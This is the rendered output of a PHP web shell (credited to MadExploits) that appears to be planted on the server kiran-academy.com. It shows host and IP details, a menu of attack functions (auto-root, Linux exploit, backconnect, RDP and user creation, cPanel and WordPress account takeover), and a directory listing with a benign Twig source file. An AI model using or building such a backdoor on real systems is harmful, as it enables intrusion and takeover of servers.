Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
cwpsrv /
var /
services /
twig /
lib /
Twig /
[ HOME SHELL ]
Name
Size
Permission
Action
Cache
[ DIR ]
drwxr-xr-x
Error
[ DIR ]
drwxr-xr-x
Extension
[ DIR ]
drwxr-xr-x
Loader
[ DIR ]
drwxr-xr-x
Node
[ DIR ]
drwxr-xr-x
NodeVisitor
[ DIR ]
drwxr-xr-x
Profiler
[ DIR ]
drwxr-xr-x
Sandbox
[ DIR ]
drwxr-xr-x
Test
[ DIR ]
drwxr-xr-x
TokenParser
[ DIR ]
drwxr-xr-x
Util
[ DIR ]
drwxr-xr-x
BaseNodeVisitor.php
1.12
KB
-rw-r--r--
CacheInterface.php
1.35
KB
-rw-r--r--
Compiler.php
5.42
KB
-rw-r--r--
ContainerRuntimeLoader.php
867
B
-rw-r--r--
Environment.php
26.4
KB
-rw-r--r--
Error.php
8
KB
-rw-r--r--
ExistsLoaderInterface.php
327
B
-rw-r--r--
ExpressionParser.php
27.71
KB
-rw-r--r--
Extension.php
701
B
-rw-r--r--
ExtensionInterface.php
1.33
KB
-rw-r--r--
ExtensionSet.php
12.53
KB
-rw-r--r--
FactoryRuntimeLoader.php
797
B
-rw-r--r--
FileExtensionEscapingStrategy....
1.39
KB
-rw-r--r--
Filter.php
2.99
KB
-rw-r--r--
Function.php
2.77
KB
-rw-r--r--
Lexer.php
15.16
KB
-rw-r--r--
LoaderInterface.php
1.61
KB
-rw-r--r--
Markup.php
795
B
-rw-r--r--
Node.php
4.6
KB
-rw-r--r--
NodeCaptureInterface.php
367
B
-rw-r--r--
NodeOutputInterface.php
346
B
-rw-r--r--
NodeTraverser.php
1.9
KB
-rw-r--r--
NodeVisitorInterface.php
1017
B
-rw-r--r--
Parser.php
10.22
KB
-rw-r--r--
RuntimeLoaderInterface.php
701
B
-rw-r--r--
SimpleFilter.php
307
B
-rw-r--r--
SimpleFunction.php
311
B
-rw-r--r--
SimpleTest.php
303
B
-rw-r--r--
Source.php
966
B
-rw-r--r--
SourceContextLoaderInterface.p...
334
B
-rw-r--r--
Template.php
12.05
KB
-rw-r--r--
TemplateWrapper.php
3
KB
-rw-r--r--
Test.php
1.87
KB
-rw-r--r--
Token.php
5.59
KB
-rw-r--r--
TokenParser.php
606
B
-rw-r--r--
TokenParserInterface.php
818
B
-rw-r--r--
TokenStream.php
3.69
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Test.php
<?php /* * This file is part of Twig. * * (c) Fabien Potencier * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ /** * Represents a template test. * * @final * * @author Fabien Potencier <fabien@symfony.com> * * @see http://twig.sensiolabs.org/doc/templates.html#test-operator */ class Twig_Test { private $name; private $callable; private $options; /** * Creates a template test. * * @param string $name Name of this test * @param callable|null $callable A callable implementing the test. If null, you need to overwrite the "node_class" option to customize compilation. * @param array $options Options array */ public function __construct(string $name, $callable = null, array $options = array()) { $this->name = $name; $this->callable = $callable; $this->options = array_merge(array( 'is_variadic' => false, 'node_class' => 'Twig_Node_Expression_Test', 'deprecated' => false, 'alternative' => null, ), $options); } public function getName() { return $this->name; } /** * Returns the callable to execute for this test. * * @return callable|null */ public function getCallable() { return $this->callable; } public function getNodeClass() { return $this->options['node_class']; } public function isVariadic() { return $this->options['is_variadic']; } public function isDeprecated() { return (bool) $this->options['deprecated']; } public function getDeprecatedVersion() { return $this->options['deprecated']; } public function getAlternative() { return $this->options['alternative']; } }
Close